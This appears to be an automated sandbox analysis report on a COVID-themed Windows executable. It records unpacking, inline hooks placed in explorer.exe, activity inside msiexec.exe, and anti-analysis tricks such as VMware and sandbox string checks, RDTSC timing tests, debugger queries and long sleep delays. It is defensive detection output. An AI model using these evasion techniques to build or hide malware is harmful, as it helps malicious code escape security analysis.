Source: C:\Users\user\Desktop\Po-covid19 2372#w2..exe

Unpacked PE file: 0.2.Po-covid19 2372#w2..exe.70000.0.unpack .text:ER;.rsrc:R;.reloc:R; vs Unknown_Section0:ER;Unknown_Section1:R;Unknown_Section2:R;

Detected unpacking (overwrites its own PE header)

Show sources

Source: C:\Users\user\Desktop\Po-covid19 2372#w2..exe

Unpacked PE file: 0.2.Po-covid19 2372#w2..exe.70000.0.unpack

Source: C:\Users\user\Desktop\Po-covid19 2372#w2..exe	Code function: 0_2_00076008 push ss; iretd	0_2_0007600A
Source: C:\Users\user\Desktop\Po-covid19 2372#w2..exe	Code function: 0_2_000723E2 push eax; ret	0_2_000723E3
Source: C:\Users\user\Desktop\Po-covid19 2372#w2..exe	Code function: 0_2_00BC2488 push ss; iretd	0_2_00BC249B
Source: C:\Users\user\Desktop\Po-covid19 2372#w2..exe	Code function: 0_2_09743122 pushad ; iretd	0_2_09743123
Source: C:\Users\user\Desktop\Po-covid19 2372#w2..exe	Code function: 2_2_00136008 push ss; iretd	2_2_0013600A
Source: C:\Users\user\Desktop\Po-covid19 2372#w2..exe	Code function: 2_2_001323E2 push eax; ret	2_2_001323E3
Source: C:\Users\user\Desktop\Po-covid19 2372#w2..exe	Code function: 3_2_0041D0E2 push eax; ret	3_2_0041D0E8
Source: C:\Users\user\Desktop\Po-covid19 2372#w2..exe	Code function: 3_2_0041D0EB push eax; ret	3_2_0041D152
Source: C:\Users\user\Desktop\Po-covid19 2372#w2..exe	Code function: 3_2_0041D095 push eax; ret	3_2_0041D0E8
Source: C:\Users\user\Desktop\Po-covid19 2372#w2..exe	Code function: 3_2_0041D14C push eax; ret	3_2_0041D152
Source: C:\Users\user\Desktop\Po-covid19 2372#w2..exe	Code function: 3_2_0041D95B push ebp; iretd	3_2_0041D95F
Source: C:\Users\user\Desktop\Po-covid19 2372#w2..exe	Code function: 3_2_004163D5 push ebx; ret	3_2_004163D6
Source: C:\Users\user\Desktop\Po-covid19 2372#w2..exe	Code function: 3_2_009B6008 push ss; iretd	3_2_009B600A
Source: C:\Users\user\Desktop\Po-covid19 2372#w2..exe	Code function: 3_2_009B23E2 push eax; ret	3_2_009B23E3
Source: C:\Users\user\Desktop\Po-covid19 2372#w2..exe	Code function: 3_2_0156D0D1 push ecx; ret	3_2_0156D0E4
Source: C:\Windows\SysWOW64\msiexec.exe	Code function: 14_2_045DD0D1 push ecx; ret	14_2_045DD0E4
Source: C:\Windows\SysWOW64\msiexec.exe	Code function: 14_2_0069D0EB push eax; ret	14_2_0069D152
Source: C:\Windows\SysWOW64\msiexec.exe	Code function: 14_2_0069D0E2 push eax; ret	14_2_0069D0E8
Source: C:\Windows\SysWOW64\msiexec.exe	Code function: 14_2_0069D095 push eax; ret	14_2_0069D0E8
Source: C:\Windows\SysWOW64\msiexec.exe	Code function: 14_2_0069D14C push eax; ret	14_2_0069D152
Source: C:\Windows\SysWOW64\msiexec.exe	Code function: 14_2_0069D95B push ebp; iretd	14_2_0069D95F
Source: C:\Windows\SysWOW64\msiexec.exe	Code function: 14_2_006963D5 push ebx; ret	14_2_006963D6

Source: initial sample

Static PE information: section name: .text entropy: 7.44459929766

Hooking and other Techniques for Hiding and Protection:

Modifies the prolog of user mode functions (user mode inline hooks)

Show sources

Source: explorer.exe

User mode code has changed: module: user32.dll function: PeekMessageA new code: 0x48 0x8B 0xB8 0x85 0x5E 0xEA

Source: C:\Users\user\Desktop\Po-covid19 2372#w2..exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Po-covid19 2372#w2..exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Po-covid19 2372#w2..exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Po-covid19 2372#w2..exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Po-covid19 2372#w2..exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Po-covid19 2372#w2..exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Po-covid19 2372#w2..exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Po-covid19 2372#w2..exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Po-covid19 2372#w2..exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Po-covid19 2372#w2..exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Po-covid19 2372#w2..exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Po-covid19 2372#w2..exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Po-covid19 2372#w2..exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Po-covid19 2372#w2..exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Po-covid19 2372#w2..exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Po-covid19 2372#w2..exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Po-covid19 2372#w2..exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Po-covid19 2372#w2..exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Po-covid19 2372#w2..exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Po-covid19 2372#w2..exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Po-covid19 2372#w2..exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Po-covid19 2372#w2..exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Po-covid19 2372#w2..exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Po-covid19 2372#w2..exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Po-covid19 2372#w2..exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Po-covid19 2372#w2..exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Po-covid19 2372#w2..exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Po-covid19 2372#w2..exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Po-covid19 2372#w2..exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Po-covid19 2372#w2..exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Po-covid19 2372#w2..exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Po-covid19 2372#w2..exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Po-covid19 2372#w2..exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Po-covid19 2372#w2..exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Po-covid19 2372#w2..exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Po-covid19 2372#w2..exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Process information set: NOGPFAULTERRORBOX \| NOOPENFILEERRORBOX	Jump to behavior

Malware Analysis System Evasion:

Yara detected AntiVM_3

Show sources

Source: Yara match	File source: 00000000.00000002.253062095.0000000002708000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: Po-covid19 2372#w2..exe PID: 5532, type: MEMORY

Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)

Show sources

Source: Po-covid19 2372#w2..exe, 00000000.00000002.254634117.00000000027FE000.00000004.00000001.sdmp	Binary or memory string: WINE_GET_UNIX_FILE_NAME
Source: Po-covid19 2372#w2..exe, 00000000.00000002.254634117.00000000027FE000.00000004.00000001.sdmp	Binary or memory string: SBIEDLL.DLL

Tries to detect virtualization through RDTSC time measurements

Show sources

Source: C:\Users\user\Desktop\Po-covid19 2372#w2..exe	RDTSC instruction interceptor: First address: 00000000004098E4 second address: 00000000004098EA instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\Po-covid19 2372#w2..exe	RDTSC instruction interceptor: First address: 0000000000409B5E second address: 0000000000409B64 instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
Source: C:\Windows\SysWOW64\msiexec.exe	RDTSC instruction interceptor: First address: 00000000006898E4 second address: 00000000006898EA instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
Source: C:\Windows\SysWOW64\msiexec.exe	RDTSC instruction interceptor: First address: 0000000000689B5E second address: 0000000000689B64 instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc

Source: C:\Users\user\Desktop\Po-covid19 2372#w2..exe

Code function: 3_2_00409A90 rdtsc

3_2_00409A90

Source: C:\Users\user\Desktop\Po-covid19 2372#w2..exe

Thread delayed: delay time: 922337203685477

Jump to behavior

Source: C:\Users\user\Desktop\Po-covid19 2372#w2..exe TID: 4012	Thread sleep time: -31500s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\Po-covid19 2372#w2..exe TID: 6008	Thread sleep time: -922337203685477s >= -30000s	Jump to behavior
Source: C:\Windows\explorer.exe TID: 6472	Thread sleep count: 54 > 30	Jump to behavior
Source: C:\Windows\explorer.exe TID: 6472	Thread sleep time: -108000s >= -30000s	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe TID: 3576	Thread sleep count: 33 > 30	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe TID: 3576	Thread sleep time: -66000s >= -30000s	Jump to behavior

Source: C:\Windows\explorer.exe	Last function: Thread delayed
Source: C:\Windows\explorer.exe	Last function: Thread delayed
Source: C:\Windows\SysWOW64\msiexec.exe	Last function: Thread delayed
Source: C:\Windows\SysWOW64\msiexec.exe	Last function: Thread delayed

Source: Po-covid19 2372#w2..exe, 00000000.00000002.254634117.00000000027FE000.00000004.00000001.sdmp	Binary or memory string: VMware
Source: explorer.exe, 00000004.00000000.276172975.000000000871F000.00000004.00000001.sdmp	Binary or memory string: SCSI\Disk&Ven_VMware&Prod_Virtual_disk\5&1ec51bf7&0&000000
Source: explorer.exe, 00000004.00000000.274761665.0000000008220000.00000002.00000001.sdmp	Binary or memory string: A Virtual Machine could not be started because Hyper-V is not installed.
Source: Po-covid19 2372#w2..exe, 00000000.00000002.254634117.00000000027FE000.00000004.00000001.sdmp	Binary or memory string: VMWARE
Source: explorer.exe, 00000004.00000000.276172975.000000000871F000.00000004.00000001.sdmp	Binary or memory string: SCSI\CDROM&VEN_NECVMWAR&PROD_VMWARE_SATA_CD00\5&280B647&0&000000
Source: explorer.exe, 00000004.00000002.635752536.0000000005603000.00000004.00000001.sdmp	Binary or memory string: \\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&280b647&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b},
Source: Po-covid19 2372#w2..exe, 00000000.00000002.254634117.00000000027FE000.00000004.00000001.sdmp	Binary or memory string: InstallPath%C:\PROGRAM FILES\VMWARE\VMWARE TOOLS\
Source: explorer.exe, 00000004.00000000.274761665.0000000008220000.00000002.00000001.sdmp	Binary or memory string: The communication protocol version between the Hyper-V Host and Guest Compute Services is not supported.
Source: Po-covid19 2372#w2..exe, 00000000.00000002.254634117.00000000027FE000.00000004.00000001.sdmp	Binary or memory string: VMware
Source: Po-covid19 2372#w2..exe, 00000000.00000002.254634117.00000000027FE000.00000004.00000001.sdmp	Binary or memory string: VMWARE"SOFTWARE\VMware, Inc.\VMware ToolsLHARDWARE\DEVICEMAP\Scsi\Scsi Port 1\Scsi Bus 0\Target Id 0\Logical Unit Id 0LHARDWARE\DEVICEMAP\Scsi\Scsi Port 2\Scsi Bus 0\Target Id 0\Logical Unit Id 0'SYSTEM\ControlSet001\Services\Disk\Enum
Source: Po-covid19 2372#w2..exe, 00000000.00000002.254634117.00000000027FE000.00000004.00000001.sdmp	Binary or memory string: VMware SVGA II
Source: Po-covid19 2372#w2..exe, 00000000.00000002.254634117.00000000027FE000.00000004.00000001.sdmp	Binary or memory string: vmwareNSYSTEM\ControlSet001\Control\Class\{4D36E968-E325-11CE-BFC1-08002BE10318}\0000
Source: explorer.exe, 00000004.00000000.276645530.00000000088C3000.00000004.00000001.sdmp	Binary or memory string: -b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#0000000000100000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATAA
Source: explorer.exe, 00000004.00000002.617345599.0000000001438000.00000004.00000020.sdmp	Binary or memory string: Hyper-V RAWal<%SystemRoot%\system32\mswsock.dllkagesB
Source: explorer.exe, 00000004.00000000.276172975.000000000871F000.00000004.00000001.sdmp	Binary or memory string: SCSI\CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00\5&280b647&0&000000:
Source: explorer.exe, 00000004.00000000.275860033.0000000008640000.00000004.00000001.sdmp	Binary or memory string: \\?\scsi#cdrom&ven_necvmwar&prod_vmware_sata_cd00#5&280b647&0&000000#{53f56308-b6bf-11d0-94f2-00a0c91efb8b}
Source: Po-covid19 2372#w2..exe, 00000000.00000002.254634117.00000000027FE000.00000004.00000001.sdmp	Binary or memory string: vmware
Source: Po-covid19 2372#w2..exe, 00000000.00000002.254634117.00000000027FE000.00000004.00000001.sdmp	Binary or memory string: l%C:\PROGRAM FILES\VMWARE\VMWARE TOOLS\
Source: explorer.exe, 00000004.00000000.268460386.00000000055D0000.00000004.00000001.sdmp	Binary or memory string: \\?\scsi#cdrom&ven_necvmwar&prod_vmware_sata_cd00#5&280b647&0&000000#{53f56308-b6bf-11d0-94f2-00a0c91efb8b}V*(E
Source: explorer.exe, 00000004.00000000.276172975.000000000871F000.00000004.00000001.sdmp	Binary or memory string: \\?\scsi#cdrom&ven_necvmwar&prod_vmware_sata_cd00#5&280b647&0&000000#{53f56308-b6bf-11d0-94f2-00a0c91efb8b}~
Source: explorer.exe, 00000004.00000000.276275523.00000000087D1000.00000004.00000001.sdmp	Binary or memory string: VMware SATA CD00ices
Source: explorer.exe, 00000004.00000000.274761665.0000000008220000.00000002.00000001.sdmp	Binary or memory string: A communication protocol error has occurred between the Hyper-V Host and Guest Compute Service.
Source: Po-covid19 2372#w2..exe, 00000000.00000002.254634117.00000000027FE000.00000004.00000001.sdmp	Binary or memory string: l"SOFTWARE\VMware, Inc.\VMware Tools
Source: explorer.exe, 00000004.00000000.274761665.0000000008220000.00000002.00000001.sdmp	Binary or memory string: An unknown internal message was received by the Hyper-V Compute Service.

Source: C:\Users\user\Desktop\Po-covid19 2372#w2..exe

Process information queried: ProcessInformation

Jump to behavior

Source: C:\Users\user\Desktop\Po-covid19 2372#w2..exe	Process queried: DebugPort			Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Process queried: DebugPort			Jump to behavior

Source: C:\Users\user\Desktop\Po-covid19 2372#w2..exe

Code function: 3_2_00409A90 rdtsc

3_2_00409A90

Source: C:\Users\user\Desktop\Po-covid19 2372#w2..exe

Code function: 3_2_0040ACD0 LdrLoadDll,

3_2_0040ACD0

Source: C:\Users\user\Desktop\Po-covid19 2372#w2..exe	Code function: 3_2_0153B944 mov eax, dword ptr fs:[00000030h]	3_2_0153B944
Source: C:\Users\user\Desktop\Po-covid19 2372#w2..exe	Code function: 3_2_0153B944 mov eax, dword ptr fs:[00000030h]	3_2_0153B944
Source: C:\Users\user\Desktop\Po-covid19 2372#w2..exe	Code function: 3_2_0151B171 mov eax, dword ptr fs:[00000030h]	3_2_0151B171
Source: C:\Users\user\Desktop\Po-covid19 2372#w2..exe	Code function: 3_2_0151B171 mov eax, dword ptr fs:[00000030h]	3_2_0151B171
Source: C:\Users\user\Desktop\Po-covid19 2372#w2..exe	Code function: 3_2_0151C962 mov eax, dword ptr fs:[00000030h]	3_2_0151C962
Source: C:\Users\user\Desktop\Po-covid19 2372#w2..exe	Code function: 3_2_01519100 mov eax, dword ptr fs:[00000030h]	3_2_01519100
Source: C:\Users\user\Desktop\Po-covid19 2372#w2..exe	Code function: 3_2_01519100 mov eax, dword ptr fs:[00000030h]	3_2_01519100
Source: C:\Users\user\Desktop\Po-covid19 2372#w2..exe	Code function: 3_2_01519100 mov eax, dword ptr fs:[00000030h]	3_2_01519100
Source: C:\Users\user\Desktop\Po-covid19 2372#w2..exe	Code function: 3_2_0154513A mov eax, dword ptr fs:[00000030h]	3_2_0154513A
Source: C:\Users\user\Desktop\Po-covid19 2372#w2..exe	Code function: 3_2_0154513A mov eax, dword ptr fs:[00000030h]	3_2_0154513A
Source: C:\Users\user\Desktop\Po-covid19 2372#w2..exe	Code function: 3_2_01534120 mov eax, dword ptr fs:[00000030h]	3_2_01534120
Source: C:\Users\user\Desktop\Po-covid19 2372#w2..exe	Code function: 3_2_01534120 mov eax, dword ptr fs:[00000030h]	3_2_01534120
Source: C:\Users\user\Desktop\Po-covid19 2372#w2..exe	Code function: 3_2_01534120 mov eax, dword ptr fs:[00000030h]	3_2_01534120
Source: C:\Users\user\Desktop\Po-covid19 2372#w2..exe	Code function: 3_2_01534120 mov eax, dword ptr fs:[00000030h]	3_2_01534120
Source: C:\Users\user\Desktop\Po-covid19 2372#w2..exe	Code function: 3_2_01534120 mov ecx, dword ptr fs:[00000030h]	3_2_01534120
Source: C:\Users\user\Desktop\Po-covid19 2372#w2..exe	Code function: 3_2_0151B1E1 mov eax, dword ptr fs:[00000030h]	3_2_0151B1E1
Source: C:\Users\user\Desktop\Po-covid19 2372#w2..exe	Code function: 3_2_0151B1E1 mov eax, dword ptr fs:[00000030h]	3_2_0151B1E1
Source: C:\Users\user\Desktop\Po-covid19 2372#w2..exe	Code function: 3_2_0151B1E1 mov eax, dword ptr fs:[00000030h]	3_2_0151B1E1
Source: C:\Users\user\Desktop\Po-covid19 2372#w2..exe	Code function: 3_2_015A41E8 mov eax, dword ptr fs:[00000030h]	3_2_015A41E8
Source: C:\Users\user\Desktop\Po-covid19 2372#w2..exe	Code function: 3_2_01542990 mov eax, dword ptr fs:[00000030h]	3_2_01542990
Source: C:\Users\user\Desktop\Po-covid19 2372#w2..exe	Code function: 3_2_0153C182 mov eax, dword ptr fs:[00000030h]	3_2_0153C182
Source: C:\Users\user\Desktop\Po-covid19 2372#w2..exe	Code function: 3_2_0154A185 mov eax, dword ptr fs:[00000030h]	3_2_0154A185
Source: C:\Users\user\Desktop\Po-covid19 2372#w2..exe	Code function: 3_2_015951BE mov eax, dword ptr fs:[00000030h]	3_2_015951BE
Source: C:\Users\user\Desktop\Po-covid19 2372#w2..exe	Code function: 3_2_015951BE mov eax, dword ptr fs:[00000030h]	3_2_015951BE
Source: C:\Users\user\Desktop\Po-covid19 2372#w2..exe	Code function: 3_2_015951BE mov eax, dword ptr fs:[00000030h]	3_2_015951BE
Source: C:\Users\user\Desktop\Po-covid19 2372#w2..exe	Code function: 3_2_015951BE mov eax, dword ptr fs:[00000030h]	3_2_015951BE
Source: C:\Users\user\Desktop\Po-covid19 2372#w2..exe	Code function: 3_2_015461A0 mov eax, dword ptr fs:[00000030h]	3_2_015461A0
Source: C:\Users\user\Desktop\Po-covid19 2372#w2..exe	Code function: 3_2_015461A0 mov eax, dword ptr fs:[00000030h]	3_2_015461A0
Source: C:\Users\user\Desktop\Po-covid19 2372#w2..exe	Code function: 3_2_015D49A4 mov eax, dword ptr fs:[00000030h]	3_2_015D49A4
Source: C:\Users\user\Desktop\Po-covid19 2372#w2..exe	Code function: 3_2_015D49A4 mov eax, dword ptr fs:[00000030h]	3_2_015D49A4
Source: C:\Users\user\Desktop\Po-covid19 2372#w2..exe	Code function: 3_2_015D49A4 mov eax, dword ptr fs:[00000030h]	3_2_015D49A4
Source: C:\Users\user\Desktop\Po-covid19 2372#w2..exe	Code function: 3_2_015D49A4 mov eax, dword ptr fs:[00000030h]	3_2_015D49A4
Source: C:\Users\user\Desktop\Po-covid19 2372#w2..exe	Code function: 3_2_015969A6 mov eax, dword ptr fs:[00000030h]	3_2_015969A6
Source: C:\Users\user\Desktop\Po-covid19 2372#w2..exe	Code function: 3_2_01530050 mov eax, dword ptr fs:[00000030h]	3_2_01530050
Source: C:\Users\user\Desktop\Po-covid19 2372#w2..exe	Code function: 3_2_01530050 mov eax, dword ptr fs:[00000030h]	3_2_01530050
Source: C:\Users\user\Desktop\Po-covid19 2372#w2..exe	Code function: 3_2_015E1074 mov eax, dword ptr fs:[00000030h]	3_2_015E1074
Source: C:\Users\user\Desktop\Po-covid19 2372#w2..exe	Code function: 3_2_015D2073 mov eax, dword ptr fs:[00000030h]	3_2_015D2073
Source: C:\Users\user\Desktop\Po-covid19 2372#w2..exe	Code function: 3_2_015E4015 mov eax, dword ptr fs:[00000030h]	3_2_015E4015
Source: C:\Users\user\Desktop\Po-covid19 2372#w2..exe	Code function: 3_2_015E4015 mov eax, dword ptr fs:[00000030h]	3_2_015E4015
Source: C:\Users\user\Desktop\Po-covid19 2372#w2..exe	Code function: 3_2_01597016 mov eax, dword ptr fs:[00000030h]	3_2_01597016
Source: C:\Users\user\Desktop\Po-covid19 2372#w2..exe	Code function: 3_2_01597016 mov eax, dword ptr fs:[00000030h]	3_2_01597016
Source: C:\Users\user\Desktop\Po-covid19 2372#w2..exe	Code function: 3_2_01597016 mov eax, dword ptr fs:[00000030h]	3_2_01597016
Source: C:\Users\user\Desktop\Po-covid19 2372#w2..exe	Code function: 3_2_0152B02A mov eax, dword ptr fs:[00000030h]	3_2_0152B02A
Source: C:\Users\user\Desktop\Po-covid19 2372#w2..exe	Code function: 3_2_0152B02A mov eax, dword ptr fs:[00000030h]	3_2_0152B02A
Source: C:\Users\user\Desktop\Po-covid19 2372#w2..exe	Code function: 3_2_0152B02A mov eax, dword ptr fs:[00000030h]	3_2_0152B02A
Source: C:\Users\user\Desktop\Po-covid19 2372#w2..exe	Code function: 3_2_0152B02A mov eax, dword ptr fs:[00000030h]	3_2_0152B02A
Source: C:\Users\user\Desktop\Po-covid19 2372#w2..exe	Code function: 3_2_0154002D mov eax, dword ptr fs:[00000030h]	3_2_0154002D
Source: C:\Users\user\Desktop\Po-covid19 2372#w2..exe	Code function: 3_2_0154002D mov eax, dword ptr fs:[00000030h]	3_2_0154002D
Source: C:\Users\user\Desktop\Po-covid19 2372#w2..exe	Code function: 3_2_0154002D mov eax, dword ptr fs:[00000030h]	3_2_0154002D
Source: C:\Users\user\Desktop\Po-covid19 2372#w2..exe	Code function: 3_2_0154002D mov eax, dword ptr fs:[00000030h]	3_2_0154002D
Source: C:\Users\user\Desktop\Po-covid19 2372#w2..exe	Code function: 3_2_0154002D mov eax, dword ptr fs:[00000030h]	3_2_0154002D
Source: C:\Users\user\Desktop\Po-covid19 2372#w2..exe	Code function: 3_2_015AB8D0 mov eax, dword ptr fs:[00000030h]	3_2_015AB8D0
Source: C:\Users\user\Desktop\Po-covid19 2372#w2..exe	Code function: 3_2_015AB8D0 mov ecx, dword ptr fs:[00000030h]	3_2_015AB8D0
Source: C:\Users\user\Desktop\Po-covid19 2372#w2..exe	Code function: 3_2_015AB8D0 mov eax, dword ptr fs:[00000030h]	3_2_015AB8D0
Source: C:\Users\user\Desktop\Po-covid19 2372#w2..exe	Code function: 3_2_015AB8D0 mov eax, dword ptr fs:[00000030h]	3_2_015AB8D0
Source: C:\Users\user\Desktop\Po-covid19 2372#w2..exe	Code function: 3_2_015AB8D0 mov eax, dword ptr fs:[00000030h]	3_2_015AB8D0
Source: C:\Users\user\Desktop\Po-covid19 2372#w2..exe	Code function: 3_2_015AB8D0 mov eax, dword ptr fs:[00000030h]	3_2_015AB8D0
Source: C:\Users\user\Desktop\Po-covid19 2372#w2..exe	Code function: 3_2_015140E1 mov eax, dword ptr fs:[00000030h]	3_2_015140E1
Source: C:\Users\user\Desktop\Po-covid19 2372#w2..exe	Code function: 3_2_015140E1 mov eax, dword ptr fs:[00000030h]	3_2_015140E1
Source: C:\Users\user\Desktop\Po-covid19 2372#w2..exe	Code function: 3_2_015140E1 mov eax, dword ptr fs:[00000030h]	3_2_015140E1
Source: C:\Users\user\Desktop\Po-covid19 2372#w2..exe	Code function: 3_2_015158EC mov eax, dword ptr fs:[00000030h]	3_2_015158EC
Source: C:\Users\user\Desktop\Po-covid19 2372#w2..exe	Code function: 3_2_01519080 mov eax, dword ptr fs:[00000030h]	3_2_01519080
Source: C:\Users\user\Desktop\Po-covid19 2372#w2..exe	Code function: 3_2_01593884 mov eax, dword ptr fs:[00000030h]	3_2_01593884
Source: C:\Users\user\Desktop\Po-covid19 2372#w2..exe	Code function: 3_2_01593884 mov eax, dword ptr fs:[00000030h]	3_2_01593884
Source: C:\Users\user\Desktop\Po-covid19 2372#w2..exe	Code function: 3_2_0154F0BF mov ecx, dword ptr fs:[00000030h]	3_2_0154F0BF
Source: C:\Users\user\Desktop\Po-covid19 2372#w2..exe	Code function: 3_2_0154F0BF mov eax, dword ptr fs:[00000030h]	3_2_0154F0BF
Source: C:\Users\user\Desktop\Po-covid19 2372#w2..exe	Code function: 3_2_0154F0BF mov eax, dword ptr fs:[00000030h]	3_2_0154F0BF
Source: C:\Users\user\Desktop\Po-covid19 2372#w2..exe	Code function: 3_2_015420A0 mov eax, dword ptr fs:[00000030h]	3_2_015420A0
Source: C:\Users\user\Desktop\Po-covid19 2372#w2..exe	Code function: 3_2_015420A0 mov eax, dword ptr fs:[00000030h]	3_2_015420A0
Source: C:\Users\user\Desktop\Po-covid19 2372#w2..exe	Code function: 3_2_015420A0 mov eax, dword ptr fs:[00000030h]	3_2_015420A0
Source: C:\Users\user\Desktop\Po-covid19 2372#w2..exe	Code function: 3_2_015420A0 mov eax, dword ptr fs:[00000030h]	3_2_015420A0
Source: C:\Users\user\Desktop\Po-covid19 2372#w2..exe	Code function: 3_2_015420A0 mov eax, dword ptr fs:[00000030h]	3_2_015420A0
Source: C:\Users\user\Desktop\Po-covid19 2372#w2..exe	Code function: 3_2_015420A0 mov eax, dword ptr fs:[00000030h]	3_2_015420A0
Source: C:\Users\user\Desktop\Po-covid19 2372#w2..exe	Code function: 3_2_015590AF mov eax, dword ptr fs:[00000030h]	3_2_015590AF
Source: C:\Users\user\Desktop\Po-covid19 2372#w2..exe	Code function: 3_2_015E8B58 mov eax, dword ptr fs:[00000030h]	3_2_015E8B58
Source: C:\Users\user\Desktop\Po-covid19 2372#w2..exe	Code function: 3_2_0151F358 mov eax, dword ptr fs:[00000030h]	3_2_0151F358
Source: C:\Users\user\Desktop\Po-covid19 2372#w2..exe	Code function: 3_2_0151DB40 mov eax, dword ptr fs:[00000030h]	3_2_0151DB40
Source: C:\Users\user\Desktop\Po-covid19 2372#w2..exe	Code function: 3_2_01543B7A mov eax, dword ptr fs:[00000030h]	3_2_01543B7A
Source: C:\Users\user\Desktop\Po-covid19 2372#w2..exe	Code function: 3_2_01543B7A mov eax, dword ptr fs:[00000030h]	3_2_01543B7A
Source: C:\Users\user\Desktop\Po-covid19 2372#w2..exe	Code function: 3_2_0151DB60 mov ecx, dword ptr fs:[00000030h]	3_2_0151DB60
Source: C:\Users\user\Desktop\Po-covid19 2372#w2..exe	Code function: 3_2_015D131B mov eax, dword ptr fs:[00000030h]	3_2_015D131B
Source: C:\Users\user\Desktop\Po-covid19 2372#w2..exe	Code function: 3_2_015953CA mov eax, dword ptr fs:[00000030h]	3_2_015953CA
Source: C:\Users\user\Desktop\Po-covid19 2372#w2..exe	Code function: 3_2_015953CA mov eax, dword ptr fs:[00000030h]	3_2_015953CA
Source: C:\Users\user\Desktop\Po-covid19 2372#w2..exe	Code function: 3_2_015403E2 mov eax, dword ptr fs:[00000030h]	3_2_015403E2
Source: C:\Users\user\Desktop\Po-covid19 2372#w2..exe	Code function: 3_2_015403E2 mov eax, dword ptr fs:[00000030h]	3_2_015403E2
Source: C:\Users\user\Desktop\Po-covid19 2372#w2..exe	Code function: 3_2_015403E2 mov eax, dword ptr fs:[00000030h]	3_2_015403E2
Source: C:\Users\user\Desktop\Po-covid19 2372#w2..exe	Code function: 3_2_015403E2 mov eax, dword ptr fs:[00000030h]	3_2_015403E2
Source: C:\Users\user\Desktop\Po-covid19 2372#w2..exe	Code function: 3_2_015403E2 mov eax, dword ptr fs:[00000030h]	3_2_015403E2
Source: C:\Users\user\Desktop\Po-covid19 2372#w2..exe	Code function: 3_2_015403E2 mov eax, dword ptr fs:[00000030h]	3_2_015403E2
Source: C:\Users\user\Desktop\Po-covid19 2372#w2..exe	Code function: 3_2_0153DBE9 mov eax, dword ptr fs:[00000030h]	3_2_0153DBE9
Source: C:\Users\user\Desktop\Po-covid19 2372#w2..exe	Code function: 3_2_01542397 mov eax, dword ptr fs:[00000030h]	3_2_01542397
